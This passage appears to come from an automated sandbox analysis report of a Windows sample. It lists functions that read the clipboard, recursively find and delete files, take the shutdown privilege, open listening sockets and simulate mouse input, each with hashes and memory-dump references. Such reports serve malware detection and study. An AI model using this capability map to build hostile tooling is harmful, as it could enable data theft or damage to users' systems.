              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00730CB4
              • CopySid.ADVAPI32(00000000), ref: 00730CBB
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00730CEA
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00730D0C
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00730D1E
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730D45
              • HeapFree.KERNEL32(00000000), ref: 00730D4C
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730D55
              • HeapFree.KERNEL32(00000000), ref: 00730D5C
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730D65
              • HeapFree.KERNEL32(00000000), ref: 00730D6C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 00730D78
              • HeapFree.KERNEL32(00000000), ref: 00730D7F
                • Part of subcall function 00731193: GetProcessHeap.KERNEL32(00000008,00730BB1,?,00000000,?,00730BB1,?), ref: 007311A1
                • Part of subcall function 00731193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00730BB1,?), ref: 007311A8
                • Part of subcall function 00731193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00730BB1,?), ref: 007311B7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
              • String ID:
              • API String ID: 4175595110-0
              • Opcode ID: d0da6c846c2da9ede811e80dd3f2df1d32031d6f1a5231efb55b3de6e90706bc
              • Instruction ID: 2e4cc43748dea0ee93f3fc4515fb786a8a89af4e5da4d4779ff994940bc917d0
              • Opcode Fuzzy Hash: d0da6c846c2da9ede811e80dd3f2df1d32031d6f1a5231efb55b3de6e90706bc
              • Instruction Fuzzy Hash: 13717D72A0020AABEF11DFA4DC45FEEBBB8BF04300F048555E955A7192D7B9A905CBB0
              Function 0074EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
              Download Yara Rule
              APIs
              • OpenClipboard.USER32(0076CC08), ref: 0074EB29
              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0074EB37
              • GetClipboardData.USER32(0000000D), ref: 0074EB43
              • CloseClipboard.USER32 ref: 0074EB4F
              • GlobalLock.KERNEL32(00000000), ref: 0074EB87
              • CloseClipboard.USER32 ref: 0074EB91
              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0074EBBC
              • IsClipboardFormatAvailable.USER32(00000001), ref: 0074EBC9
              • GetClipboardData.USER32(00000001), ref: 0074EBD1
              • GlobalLock.KERNEL32(00000000), ref: 0074EBE2
              • GlobalUnlock.KERNEL32(00000000,?), ref: 0074EC22
              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0074EC38
              • GetClipboardData.USER32(0000000F), ref: 0074EC44
              • GlobalLock.KERNEL32(00000000), ref: 0074EC55
              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0074EC77
              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074EC94
              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074ECD2
              • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0074ECF3
              • CountClipboardFormats.USER32 ref: 0074ED14
              • CloseClipboard.USER32 ref: 0074ED59
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
              • String ID:
              • API String ID: 420908878-0
              • Opcode ID: f9ad4836b8881398c805ec99b10c4ec892ae9ad04fb1793d89e9b3b448b4446d
              • Instruction ID: 26bca0bc1d2f79236c8b5b7e59c8c7fe617b200fc349f9ecedf46cbd8b36394c
              • Opcode Fuzzy Hash: f9ad4836b8881398c805ec99b10c4ec892ae9ad04fb1793d89e9b3b448b4446d
              • Instruction Fuzzy Hash: E661AC742043019FD301EF24D898F3A77A5FF84724F08855EF896872A2CB79E905CBA6
              Function 0074698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 007469BE
              • FindClose.KERNEL32(00000000), ref: 00746A12
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00746A4E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00746A75
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00746AB2
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00746ADF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
              • API String ID: 3830820486-3289030164
              • Opcode ID: ce5ab46fd1609299e68eb528a3760ec7fe76e7fba490e43b7a37ed0cebaf3dc8
              • Instruction ID: fe9c467129c160baf71d1a7cbb9fe03151f040d5701f3ae4040243f957447cb9
              • Opcode Fuzzy Hash: ce5ab46fd1609299e68eb528a3760ec7fe76e7fba490e43b7a37ed0cebaf3dc8
              • Instruction Fuzzy Hash: 42D173B1908340AFC754EBA4D891EABB7EDBF88704F44491EF585C7291EB74DA04CB62
              Function 00749642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00749663
              • GetFileAttributesW.KERNEL32(?), ref: 007496A1
              • SetFileAttributesW.KERNEL32(?,?), ref: 007496BB
              • FindNextFileW.KERNEL32(00000000,?), ref: 007496D3
              • FindClose.KERNEL32(00000000), ref: 007496DE
              • FindFirstFileW.KERNEL32(*.*,?), ref: 007496FA
              • SetCurrentDirectoryW.KERNEL32(?), ref: 0074974A
              • SetCurrentDirectoryW.KERNEL32(00796B7C), ref: 00749768
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00749772
              • FindClose.KERNEL32(00000000), ref: 0074977F
              • FindClose.KERNEL32(00000000), ref: 0074978F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
              • String ID: *.*
              • API String ID: 1409584000-438819550
              • Opcode ID: 6a189900d562fd0f3cfdd0de180322517b7f1be12165ae9442f54888fe8bf475
              • Instruction ID: 9dd12a5f6265c9a0a3a34b12d2d3c94abe420f8161b55ac953df22588976fcbd
              • Opcode Fuzzy Hash: 6a189900d562fd0f3cfdd0de180322517b7f1be12165ae9442f54888fe8bf475
              • Instruction Fuzzy Hash: B731F9725402196EDF11EFB4DC09AEF77ACAF09320F148156FA56E2190EB78DE448B14
              Function 0074979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007497BE
              • FindNextFileW.KERNEL32(00000000,?), ref: 00749819
              • FindClose.KERNEL32(00000000), ref: 00749824
              • FindFirstFileW.KERNEL32(*.*,?), ref: 00749840
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00749890
              • SetCurrentDirectoryW.KERNEL32(00796B7C), ref: 007498AE
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007498B8
              • FindClose.KERNEL32(00000000), ref: 007498C5
              • FindClose.KERNEL32(00000000), ref: 007498D5
                • Part of subcall function 0073DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0073DB00
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
              • String ID: *.*
              • API String ID: 2640511053-438819550
              • Opcode ID: c780874a21ad45ac86f7947febb4d53a835f8b8b8cef2efe8260e8610610cd08
              • Instruction ID: c049285ddb61d30c35fcd9dfff684781a7d875f4b443f07a49a77d302ff12b77
              • Opcode Fuzzy Hash: c780874a21ad45ac86f7947febb4d53a835f8b8b8cef2efe8260e8610610cd08
              • Instruction Fuzzy Hash: C931E4715003196EEF11EFB8EC49AEF77ACAF06320F148256FA51A2191DB78DE44CB24
              Function 00748195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
              Download Yara Rule
              APIs
              • GetLocalTime.KERNEL32(?), ref: 00748257
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00748267
              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00748273
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00748310
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00748324
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00748356
              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0074838C
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00748395
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CurrentDirectoryTime$File$Local$System
              • String ID: *.*
              • API String ID: 1464919966-438819550
              • Opcode ID: 0c3c1c8d972425a22753478f90c2e5629657babe5ecc5d1133feb463515690b3
              • Instruction ID: b7adcd07df4f8150e2f4655e967cec24d17107c75c5b6f2a12519b71cc609257
              • Opcode Fuzzy Hash: 0c3c1c8d972425a22753478f90c2e5629657babe5ecc5d1133feb463515690b3
              • Instruction Fuzzy Hash: 5A616A725043099FCB50EF64D8449AEB3E9FF89310F04891EF989C7251EB39E945CB96
              Function 0073D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
                • Part of subcall function 0073E199: GetFileAttributesW.KERNEL32(?,0073CF95), ref: 0073E19A
              • FindFirstFileW.KERNEL32(?,?), ref: 0073D122
              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0073D1DD
              • MoveFileW.KERNEL32(?,?), ref: 0073D1F0
              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0073D20D
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0073D237
                • Part of subcall function 0073D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0073D21C,?,?), ref: 0073D2B2
              • FindClose.KERNEL32(00000000,?,?,?), ref: 0073D253
              • FindClose.KERNEL32(00000000), ref: 0073D264
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
              • String ID: \*.*
              • API String ID: 1946585618-1173974218
              • Opcode ID: 8d8350918ee7d2835e02ad51641f89498d10bb290706d340d4796fa6929d2817
              • Instruction ID: bce085d378b6d754e39ed4505b7288ef27929317601873dc31b4c67e6b6eb938
              • Opcode Fuzzy Hash: 8d8350918ee7d2835e02ad51641f89498d10bb290706d340d4796fa6929d2817
              • Instruction Fuzzy Hash: 75618D31D0110D9FDF15EBE0EA929EEB776AF15300F24416AE40277292EB345F09DB65
              Function 0074ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
              • String ID:
              • API String ID: 1737998785-0
              • Opcode ID: d7bc9851155d743fe890564f93417b07b91641f4f64ea739b960c5818ef115ae
              • Instruction ID: 76fd42fe24232da41f34ba76e19fb0f16b4ea39360d2add1a9b01192d92906c7
              • Opcode Fuzzy Hash: d7bc9851155d743fe890564f93417b07b91641f4f64ea739b960c5818ef115ae
              • Instruction Fuzzy Hash: 1C417935604611AFE721DF15D888F2ABBA5FF44328F14C099E8568B662C779EC42CB98
              Function 0073E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 007316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0073170D
                • Part of subcall function 007316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0073173A
                • Part of subcall function 007316C3: GetLastError.KERNEL32 ref: 0073174A
              • ExitWindowsEx.USER32(?,00000000), ref: 0073E932
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
              • String ID: $ $@$SeShutdownPrivilege
              • API String ID: 2234035333-3163812486
              • Opcode ID: 29605785c4c4f674a4c988537f27825083788cba4fe7177f13e150eb66884608
              • Instruction ID: 7644832773076d6076f8b54017c6d6cdc5ef9e16c7ca41c84611a131e81c1e17
              • Opcode Fuzzy Hash: 29605785c4c4f674a4c988537f27825083788cba4fe7177f13e150eb66884608
              • Instruction Fuzzy Hash: 4B01D672610315EBFB5466B49C8ABBB725CA714750F154522FC03E21D3D5AD6C408395
              Function 00751204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
              Download Yara Rule
              APIs
              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00751276
              • WSAGetLastError.WSOCK32 ref: 00751283
              • bind.WSOCK32(00000000,?,00000010), ref: 007512BA
              • WSAGetLastError.WSOCK32 ref: 007512C5
              • closesocket.WSOCK32(00000000), ref: 007512F4
              • listen.WSOCK32(00000000,00000005), ref: 00751303
              • WSAGetLastError.WSOCK32 ref: 0075130D
              • closesocket.WSOCK32(00000000), ref: 0075133C
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$closesocket$bindlistensocket
              • String ID:
              • API String ID: 540024437-0
              • Opcode ID: e11f8cacd6958e878d31d180a7fc7d56a5fac0d13bd429cabf37b67a729695c9
              • Instruction ID: 4a023fd7b94370d9522c3e88ee3e41cf9f48f41cd75a973526b27d2c490e090f
              • Opcode Fuzzy Hash: e11f8cacd6958e878d31d180a7fc7d56a5fac0d13bd429cabf37b67a729695c9
              • Instruction Fuzzy Hash: B6419331A002019FD710DF24C498B69BBE6BF86319F588199D8568F396C7B9EC85CBE1
              Function 0070B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 0070B9D4
              • _free.LIBCMT ref: 0070B9F8
              • _free.LIBCMT ref: 0070BB7F
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00773700), ref: 0070BB91
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0070BC09
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A1270,000000FF,?,0000003F,00000000,?), ref: 0070BC36
              • _free.LIBCMT ref: 0070BD4B
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID:
              • API String ID: 314583886-0
              • Opcode ID: ff62f05893bd03654710251118826394acccf7fcb898ef9175009f9c40334fa1
              • Instruction ID: 8b73b1cf3add4b2e3befb79fdd0ba1a848c2488a021a9335b104180babde4212
              • Opcode Fuzzy Hash: ff62f05893bd03654710251118826394acccf7fcb898ef9175009f9c40334fa1
              • Instruction Fuzzy Hash: A6C118B1A04205DFDB20DF688C45BAABBE9EF82310F64839AE594D72D1D7389F418754
              Function 0073D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
                • Part of subcall function 0073E199: GetFileAttributesW.KERNEL32(?,0073CF95), ref: 0073E19A
              • FindFirstFileW.KERNEL32(?,?), ref: 0073D420
              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0073D470
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0073D481
              • FindClose.KERNEL32(00000000), ref: 0073D498
              • FindClose.KERNEL32(00000000), ref: 0073D4A1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
              • String ID: \*.*
              • API String ID: 2649000838-1173974218
              • Opcode ID: d0d186c2cc7bbfd8b449b01c630ffdaa9258bd91fc18ec41823ea8d55f5985ad
              • Instruction ID: eac0b61cea7083ceae01ddbda10383e577232688b13f8a8e79fb91f9164828a7
              • Opcode Fuzzy Hash: d0d186c2cc7bbfd8b449b01c630ffdaa9258bd91fc18ec41823ea8d55f5985ad
              • Instruction Fuzzy Hash: 793190314083819FD315EF60D8918AFB7A9BE91300F444A1EF8D152292EB34AE09C7A7
              Function 0070E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 4e7c5b1c64c152118a28c5fc1936f06ccb31f59c6b77d74653aaee0572b1885b
              • Instruction ID: fc4c059e3dd3992df76e8b32b6770aea6016ab072556c73e08d9e955c1b7d637
              • Opcode Fuzzy Hash: 4e7c5b1c64c152118a28c5fc1936f06ccb31f59c6b77d74653aaee0572b1885b
              • Instruction Fuzzy Hash: C1C22971E04628CFDB65CE289D407EAB7F5EB44314F1446EAD84DE7281E778AE818F40
              Function 0074648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 007464DC
              • CoInitialize.OLE32(00000000), ref: 00746639
              • CoCreateInstance.OLE32(0076FCF8,00000000,00000001,0076FB68,?), ref: 00746650
              • CoUninitialize.OLE32 ref: 007468D4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateInitializeInstanceUninitialize_wcslen
              • String ID: .lnk
              • API String ID: 886957087-24824748
              • Opcode ID: 23728add326f4e8799e038a8273b90ec5e76e3cf346854aa68f885b76ec5ca21
              • Instruction ID: cb9ef2f34f99fcac94052ca47b1de849c821af0f6a8f52df6ca59be83f865122
              • Opcode Fuzzy Hash: 23728add326f4e8799e038a8273b90ec5e76e3cf346854aa68f885b76ec5ca21
              • Instruction Fuzzy Hash: 80D12871908301AFC354EF24C88196BB7E9FF95704F40496DF5958B2A1EB71ED05CBA2
              Function 007522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32(?,?,00000000), ref: 007522E8
                • Part of subcall function 0074E4EC: GetWindowRect.USER32(?,?), ref: 0074E504
              • GetDesktopWindow.USER32 ref: 00752312
              • GetWindowRect.USER32(00000000), ref: 00752319
              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00752355
              • GetCursorPos.USER32(?), ref: 00752381
              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007523DF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
